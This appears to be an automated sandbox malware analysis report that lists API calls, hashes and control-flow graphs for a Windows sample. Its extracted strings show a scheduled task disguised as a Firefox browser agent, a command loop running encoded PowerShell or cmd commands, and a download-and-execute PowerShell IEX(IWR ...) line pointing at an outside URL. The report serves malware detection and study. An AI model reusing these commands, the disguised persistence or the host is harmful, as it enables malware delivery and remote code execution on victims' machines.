                    • Instruction ID: b179097a8731376eed60aae9f4b0336e4988a899298a73a61d8e81439cecc05e
                    • Opcode Fuzzy Hash: 65e05220bc180b4671c9d9a46469631164c1289e0fffdf3fae8b2d83d2a62b44
                    • Instruction Fuzzy Hash: B5318534F01248AFD7009B68D899F9EBBB8EF45344F0581E9E945A7351EA309D85C7A0
                    APIs
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00BD637D
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00BD6384
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00BD6399
                    • CloseHandle.KERNEL32(?), ref: 00BD63A6
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00BD63D0
                    • CloseHandle.KERNEL32(?), ref: 00BD63DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                    • String ID: SeShutdownPrivilege
                    • API String ID: 158869116-3733053543
                    • Opcode ID: 3c9a6717a6f6617787783aa409cb08ed622c4d73946c6d29528f244bc6a7343d
                    • Instruction ID: 55d015695722c40681b8d718133c6357d4453e92f1e69734f4449aca55369e23
                    • Opcode Fuzzy Hash: 3c9a6717a6f6617787783aa409cb08ed622c4d73946c6d29528f244bc6a7343d
                    • Instruction Fuzzy Hash: 51014F31A41218FBDB209BE4ED0EFAEBBBDEB04711F114096F914A7290FB714A1497A5
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D14EF8
                    • IsDebuggerPresent.KERNEL32 ref: 00D14FC4
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D14FDD
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00D14FE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: 44a543181887f2b58dc04dfaff4944b82446d3cabeddf5e82e6f2237280832c7
                    • Instruction ID: ca823bb2a28f8666d778fec11139f7c730c43227bc90420d43c47e9a32d74703
                    • Opcode Fuzzy Hash: 44a543181887f2b58dc04dfaff4944b82446d3cabeddf5e82e6f2237280832c7
                    • Instruction Fuzzy Hash: 2E31F975D05318EBDB21DFA4E9497CDBBB8AF08300F1041AAE40CAB250EB759B85CF65
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D17983
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D1798D
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D1799A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 7ffc34e66c9d24a2f7e58834265f9f2de36cd1664b6945f4ad5e2db96c03a118
                    • Instruction ID: 1eaf8ea2cbaf437cf1cfaafae62d5c04607a1b0c3a32f76f3280792da91b4fbd
                    • Opcode Fuzzy Hash: 7ffc34e66c9d24a2f7e58834265f9f2de36cd1664b6945f4ad5e2db96c03a118
                    • Instruction Fuzzy Hash: 96319574901218ABCB21DF64E989BDDB7B4BF58310F5041DAE41CA7250EB749BC58F64
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D1FD7C,?,?,00000008,?,?,00D1F97F,00000000), ref: 00D1FFAE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 6f2f39fc9350656791ae5724d14b1cd5c8eaf8a0a866cd8f9fa584a9fb890eaf
                    • Instruction ID: f7640218b009415191c14cc88de251d2edbfd8de8bc59e87ae92c9934b15318d
                    • Opcode Fuzzy Hash: 6f2f39fc9350656791ae5724d14b1cd5c8eaf8a0a866cd8f9fa584a9fb890eaf
                    • Instruction Fuzzy Hash: 9DB15C312106089FD715CF28D586BA57FE0FF45364F298668E8DACF2A2C735E982CB50
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D1519B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: 7b5ddb0e7c1b1a6a1237a3bb72a3f52bf7c60916c39fea96688cbe0ad5e91b7b
                    • Instruction ID: b813c7ae5632160368646468051a352a204524245c452d85198befd307906038
                    • Opcode Fuzzy Hash: 7b5ddb0e7c1b1a6a1237a3bb72a3f52bf7c60916c39fea96688cbe0ad5e91b7b
                    • Instruction Fuzzy Hash: 8EA18EB2910704DBDB29CF54E98179EBBB0FB95320F28812AD425E7754D7789981CF70
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 78e528a6a09bc100e0fd72c8f7cf6fa7795f038fe6fc494cc1d8250406a58990
                    • Instruction ID: da122428240b7ab3878f992b75058e52d955efb29a170bbef40c50b51dee35c8
                    • Opcode Fuzzy Hash: 78e528a6a09bc100e0fd72c8f7cf6fa7795f038fe6fc494cc1d8250406a58990
                    • Instruction Fuzzy Hash: 3C31D472900218BFCB20DEA8ECE5DEBB77DEF84310F184158F80597244EA30AE808B70
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick
                    • String ID:
                    • API String ID: 536389180-0
                    • Opcode ID: c38598549e83ff64abf5b73316c237ec0e718ef0f1d3a2f818954b0fde65be40
                    • Instruction ID: 802916534a5f05f138557cc36385cedb6817ea4bfef140e9dc96007d2927693a
                    • Opcode Fuzzy Hash: c38598549e83ff64abf5b73316c237ec0e718ef0f1d3a2f818954b0fde65be40
                    • Instruction Fuzzy Hash: 49318C363114008BC75CCF2CECA5A25F3E2A799314B19867BD91AD73E1FA35E802CB45
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00005085,00D1488D), ref: 00D1507E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 60234127b79b5e41f21665ddf53bbce976eeb6cc314f51b0b5718c84ed72c4a4
                    • Instruction ID: c5c2e586fcf8f322b5b0f5715b247147e5cf0eff7f4aa2dbac810aab73d0b0e7
                    • Opcode Fuzzy Hash: 60234127b79b5e41f21665ddf53bbce976eeb6cc314f51b0b5718c84ed72c4a4
                    • Instruction Fuzzy Hash:
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 41377a65c8464930f3900d225757f879d78da9450391cff75ba1eb08b047bb64
                    • Instruction ID: d4575a8e0aa4950bb74fd5f41379115be53dbe9e4299aaf79c5ac4ba5e8e34b8
                    • Opcode Fuzzy Hash: 41377a65c8464930f3900d225757f879d78da9450391cff75ba1eb08b047bb64
                    • Instruction Fuzzy Hash: 3251C331D192D84EDB1D8BED88542ECBFB19F56200F5441FED896A7782D9284A09CB61
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: bc913d62ec2f6126fa3789c195fc5f69592aaec70c00e32ee9487e25ea047c21
                    • Instruction ID: b18f3e831ad8a8a419145a9af1b78ed89a97ca4a97a61302eb7ff5dae1c2da38
                    • Opcode Fuzzy Hash: bc913d62ec2f6126fa3789c195fc5f69592aaec70c00e32ee9487e25ea047c21
                    • Instruction Fuzzy Hash: 64A012303003018F43608F319A1630E35A8555059030040545004C0220DA3445124F21
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: df13ecf6b857fba0f51fa2fc3b7ec52def9905d6387d66609c694c65ae35e659
                    • Instruction ID: e557c6f2b0bddb72e03d5e500710c7cbbe4ffbc562f1a3fb1ca152e3324f3d92
                    • Opcode Fuzzy Hash: df13ecf6b857fba0f51fa2fc3b7ec52def9905d6387d66609c694c65ae35e659
                    • Instruction Fuzzy Hash: 91720A348241998ADB18EB64D8A57ECB7B4BF22700F4411FED48A12A57BF711B89CF61
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                    • Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
                    • Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                    • Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 297 bd6d50-bd6da9 VariantInit CoCreateInstance 298 bd6e09 297->298 299 bd6dab-bd6dda 297->299 300 bd6e0c-bd6e0f 298->300 299->298 303 bd6ddc-bd6dfc SysAllocString 299->303 302 bd6e13-bd6e1b 300->302 304 bd6e1d-bd6e1e SysFreeString 302->304 305 bd6e20-bd6e24 302->305 303->300 312 bd6dfe-bd6e07 303->312 304->305 306 bd717a-bd717f 305->306 307 bd6e2a-bd6e5b SysAllocString SysFreeString 305->307 308 bd7187-bd7190 306->308 309 bd7181-bd7183 306->309 313 bd6e7d-bd6e7f 307->313 314 bd6e5d-bd6e7a SysAllocString SysFreeString 307->314 309->308 312->302 315 bd6e99-bd6eb1 313->315 316 bd6e81-bd6e97 SysAllocString SysFreeString 313->316 314->313 320 bd6eb7-bd6ecd 315->320 321 bd7171-bd7175 315->321 316->315 323 bd6ecf-bd6f0b SysAllocString SysFreeString SysAllocString SysFreeString 320->323 324 bd6f10-bd6f26 320->324 321->306 323->324 327 bd6f28-bd6f6f SysAllocString SysFreeString 324->327 328 bd6f74-bd6f98 324->328 327->328 333 bd6f9e-bd6faf 328->333 334 bd7036-bd703b 328->334 333->334 342 bd6fb5-bd6fc8 333->342 335 bd703d-bd703f 334->335 336 bd7043-bd7048 334->336 335->336 338 bd704a-bd704c 336->338 339 bd7050-bd7074 336->339 338->339 345 bd70d6-bd70db 339->345 346 bd7076-bd7087 339->346 342->334 350 bd6fca-bd700c SysAllocString SysFreeString SysAllocString SysFreeString 342->350 348 bd70dd-bd70df 345->348 349 bd70e3-bd70e8 345->349 346->345 356 bd7089-bd709c 346->356 348->349 352 bd70ea-bd70ec 349->352 353 bd70f0-bd70f4 349->353 364 bd702d-bd7031 350->364 365 bd700e-bd7028 SysAllocString SysFreeString 350->365 352->353 357 bd7168-bd716c 353->357 358 bd70f6-bd7162 VariantInit SysAllocString * 2 SysFreeString VariantClear 353->358 356->345 362 bd709e-bd70b9 SysAllocString SysFreeString 356->362 357->321 358->357 367 bd70cd-bd70d1 362->367 368 bd70bb-bd70cb SysAllocString SysFreeString 362->368 364->334 365->364 367->345 368->367
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00BD6D6E
                    • CoCreateInstance.OLE32(00BD1020,00000000,00000001,00BD1000,?), ref: 00BD6D9B
                    • SysAllocString.OLEAUT32(00BD1498), ref: 00BD6DE1
                    • SysFreeString.OLEAUT32(?), ref: 00BD6E1E
                    • SysAllocString.OLEAUT32(\Mozilla), ref: 00BD6E2F
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6E51
                    • SysAllocString.OLEAUT32(\Mozilla), ref: 00BD6E62
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6E78
                    • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 00BD6E86
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6E97
                    • SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 00BD6ED4
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6EE3
                    • SysAllocString.OLEAUT32(Mozilla), ref: 00BD6EEA
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6EF9
                    • SysAllocString.OLEAUT32(PT0S), ref: 00BD6F4E
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6F5D
                    • SysAllocString.OLEAUT32(Trigger1), ref: 00BD6FCF
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6FDE
                    • SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 00BD6FE5
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD6FF4
                    • SysAllocString.OLEAUT32(PT1M), ref: 00BD7013
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD7022
                    • SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 00BD70A3
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD70B2
                    • SysAllocString.OLEAUT32(?), ref: 00BD70BC
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD70CB
                    • VariantInit.OLEAUT32(?), ref: 00BD70FA
                    • SysAllocString.OLEAUT32(00BD113C), ref: 00BD710E
                    • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 00BD711F
                    • SysFreeString.OLEAUT32(00000000), ref: 00BD715C
                    • VariantClear.OLEAUT32(?), ref: 00BD7162
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
                    • String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 318146B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
                    • API String ID: 3904693211-3377861604
                    • Opcode ID: 95c3f2fe5b13c293039b55f497451dcf5fd1de66a8cb251bfe6d1973421107b3
                    • Instruction ID: 0a0641ef3564ffc35d59cb1055a1ade857b4a35a417d4905b5cbdb2a53a0afab
                    • Opcode Fuzzy Hash: 95c3f2fe5b13c293039b55f497451dcf5fd1de66a8cb251bfe6d1973421107b3
                    • Instruction Fuzzy Hash: F4F1FB70A00219AFDB14DBA9C858FAEBBF9FF49304F104199F505EB260EB71AD45CB61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 407 bd8120-bd8175 wsprintfA GetTickCount64 call bd2820 410 bd8178-bd8199 call bd6830 407->410 413 bd81ad-bd81bb lstrcmpA 410->413 414 bd819b-bd81ab Sleep 410->414 415 bd81bd-bd81cc call bd93a0 call bd5780 413->415 416 bd81ce-bd81f8 call bd65e0 * 2 call bd63f0 413->416 414->410 415->410 427 bd81fe-bd8200 416->427 428 bd867b-bd8699 GetTickCount64 416->428 427->428 431 bd8206-bd820c 427->431 429 bd86be-bd86db call bd5780 Sleep 428->429 430 bd869b 428->430 429->410 434 bd869d-bd869f 430->434 435 bd86a1-bd86bb call bd2820 call bd76f0 430->435 431->428 432 bd8212-bd8285 call bd57a0 call bd7710 call bd2680 call bd5760 call bd57a0 call bd65e0 call bd2820 call bd76f0 StrToIntA 431->432 457 bd828b 432->457 458 bd8671-bd8679 call bd5780 432->458 434->429 434->435 435->429 459 bd8653-bd865a call bd6370 457->459 460 bd8292-bd82a6 call bd65e0 * 2 457->460 458->429 459->458 467 bd865c-bd866b InitiateSystemShutdownExW 459->467 460->458 470 bd82ac-bd82ae 460->470 467->458 470->458 471 bd82b4-bd82dd StrToIntA call bd63f0 call bd5760 470->471 471->458 476 bd82e3-bd82e9 471->476 477 bd832f-bd8332 476->477 478 bd82eb-bd832d GetSystemDirectoryW PathCombineW wnsprintfW 476->478 479 bd8384-bd83cb GetModuleHandleA GetProcAddress * 2 477->479 480 bd8334-bd834d call bd63f0 call bd2960 477->480 478->479 482 bd83cd-bd83d0 479->482 483 bd83d3-bd83d7 479->483 480->479 492 bd834f-bd837f ExpandEnvironmentStringsW wnsprintfW call bd5780 480->492 482->483 485 bd83d9-bd83ee call bd5850 483->485 486 bd8411-bd8435 LoadLibraryA GetProcAddress 483->486 490 bd8439-bd843e 485->490 495 bd83f0-bd840f call bd63f0 call bd2850 call bd5780 485->495 486->490 493 bd8445-bd8457 call bd5760 490->493 494 bd8440 490->494 492->479 502 bd845d-bd84e2 call bd9340 call bd7710 wsprintfA wnsprintfA call bd2680 call bd6830 493->502 503 bd84f8-bd850f call bd5780 * 3 493->503 494->493 495->490 521 bd84eb-bd84f5 call bd5780 502->521 522 bd84e4-bd84e6 call bd5780 502->522 503->429 521->503 522->521
                    APIs
                    • wsprintfA.USER32 ref: 00BD8146
                    • GetTickCount64.KERNEL32 ref: 00BD8154
                      • Part of subcall function 00BD6830: ObtainUserAgentString.URLMON(00000000,?,00BD9478), ref: 00BD6852
                      • Part of subcall function 00BD6830: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00BD6872
                      • Part of subcall function 00BD6830: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD68D8
                      • Part of subcall function 00BD6830: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 00BD691B
                      • Part of subcall function 00BD6830: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6938
                      • Part of subcall function 00BD6830: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 00BD6971
                      • Part of subcall function 00BD6830: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BD699A
                    • Sleep.KERNEL32(00000000), ref: 00BD81A6
                    • lstrcmpA.KERNEL32(00000000,INIT), ref: 00BD81B3
                    • StrToIntA.SHLWAPI(00000000), ref: 00BD8276
                    • StrToIntA.SHLWAPI(00000000), ref: 00BD82BB
                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00BD82F7
                    • PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 00BD8310
                    • wnsprintfW.SHLWAPI ref: 00BD8324
                    • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00BD8360
                    • wnsprintfW.SHLWAPI ref: 00BD8374
                      • Part of subcall function 00BD5780: GetProcessHeap.KERNEL32(00000000,00000000,00BD86C5), ref: 00BD5787
                      • Part of subcall function 00BD5780: HeapFree.KERNEL32(00000000), ref: 00BD578E
                    • GetModuleHandleA.KERNEL32(kernel32), ref: 00BD8397
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BD83A5
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BD83BA
                    • LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 00BD841B
                    • GetProcAddress.KERNEL32(00000000), ref: 00BD8422
                    • wsprintfA.USER32 ref: 00BD8482
                    • wnsprintfA.SHLWAPI ref: 00BD84AE
                      • Part of subcall function 00BD2960: GetProcessHeap.KERNEL32(00000008,?), ref: 00BD2972
                      • Part of subcall function 00BD2960: HeapAlloc.KERNEL32(00000000), ref: 00BD2979
                    • Sleep.KERNEL32(00000000), ref: 00BD86D6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
                    • String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
                    • API String ID: 1920831074-1153165106
                    • Opcode ID: 6fbaa22846674a4b1918153a6e7d77a5eccbaca54f85979a12db5fe74cafb8d7
                    • Instruction ID: 71fb68ed29b503cf200badc0651c911d7f144b979857a93c4d463bb466c07b3c
                    • Opcode Fuzzy Hash: 6fbaa22846674a4b1918153a6e7d77a5eccbaca54f85979a12db5fe74cafb8d7
                    • Instruction Fuzzy Hash: A2C18D71E00204EBCB14EBA8DC95AAEF7F5AF44301F1405ABE906A7391FF749E048B94
                    APIs
                    • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 00BD8921
                    • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 00BD8934
                    • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00BD8947
                    • GetFileAttributesW.KERNEL32(?), ref: 00BD896D
                    • GetFileAttributesW.KERNEL32(?), ref: 00BD8986
                    • lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 00BD899D
                    • wnsprintfW.SHLWAPI ref: 00BD89C0
                    • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 00BD89E2
                    Strings
                    • /c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 00BD89AF
                    • https://www.wilkinsonbeane.com/css/slider, xrefs: 00BD89AA
                    • open, xrefs: 00BD89DB
                    • %ComSpec%, xrefs: 00BD8942
                    • %SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 00BD892F
                    • sd4.ps1, xrefs: 00BD8991
                    • sd2.ps1, xrefs: 00BD8978
                    • %SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 00BD891C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
